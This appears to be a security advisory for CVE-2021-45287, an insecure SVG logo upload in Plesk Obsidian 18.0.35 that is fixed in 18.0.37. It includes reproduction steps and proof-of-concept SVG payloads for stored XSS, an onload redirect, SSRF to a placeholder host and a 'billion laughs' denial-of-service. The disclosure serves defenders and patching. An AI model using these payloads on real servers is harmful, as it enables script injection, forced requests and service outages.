It was discovered an insecure Upload function in Plesk Branding Logo.
By uploading a crafted SVG file as the logo, it is possible to achieve Stored XSS, Redirection, SSRF and XXE.
CVE: CVE-2021-45287
Product: https://www.plesk.com/
Tested Version: Plesk Obsidian 18.0.35 Update #1
Fixed version: Plesk Obsidian 18.0.37
STEPS TO REPRODUCE:
1.Go to: https://domain.com/plesk/logo/
2.Upload a svg File with the malicious content
3.Return to the main webpage, do right click on the brand logo, and select open image in new tab. The code is going to be executed.
_______________POC XSS_______________
<?xml version=»1.0″ standalone=»no»?>
<!DOCTYPE svg PUBLIC «-//W3C//DTD SVG 1.1//EN» «http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd«>
<svg version=»1.1″ baseProfile=»full» xmlns=»http://www.w3.org/2000/svg«>
<script type=»text/javascript»>alert(«XSS»)</script>
</svg>
_______________POC_ REDIRECTION_______________
<?xml version=»1.0″ encoding=»UTF-8″ standalone=»yes»?>
<svg
onload=»window.location=’http://www.example.com‘»
xmlns=»http://www.w3.org/2000/svg«>
</svg>
______________POC_SSRF_______________
<svg xmlns:svg=»http://www.w3.org/2000/svg» xmlns=»http://www.w3.org/2000/svg» xmlns:xlink=»http://www.w3.org/1999/xlink» width=»200″ height=»200″>
<image height=»30″ width=»30″
xlink:href=»https://malicious.site/malicious.php» />
</svg>
_________POC_XXE_BILLION_LAUGHS_READ_NOTE_PLS____________
!!!!!!!!!!!!!!!!!!IMPORTANT NOTE!!!!!!!!!!!!!!!!!!!!!!!!!!!
DO NOT USE THIS ON PRODUCTION ENVIRONMENT, IT CAUSES A DENIAL OF SERVICE
<?xml version=»1.0″ standalone=»yes»?>
<!DOCTYPE lolz [
<!ENTITY lol «lol»>
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 «&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;»>
<!ENTITY lol2 «&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;»>
<!ENTITY lol3 «&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;»>
<!ENTITY lol4 «&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;»>
<!ENTITY lol5 «&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;»>
<!ENTITY lol6 «&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;»>
<!ENTITY lol7 «&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;»>
<!ENTITY lol8 «&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;»>
<!ENTITY lol9 «&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;»>
]>
<lolz>&lol9;</lolz>
<svg width=»128px» height=»128px» xmlns=»http://www.w3.org/2000/svg» xmlns:xlink=»http://www.w3.org/1999/xlink» version=»1.1″>
<text font-size=»23″ x=»8″ y=»28″></text>
</svg>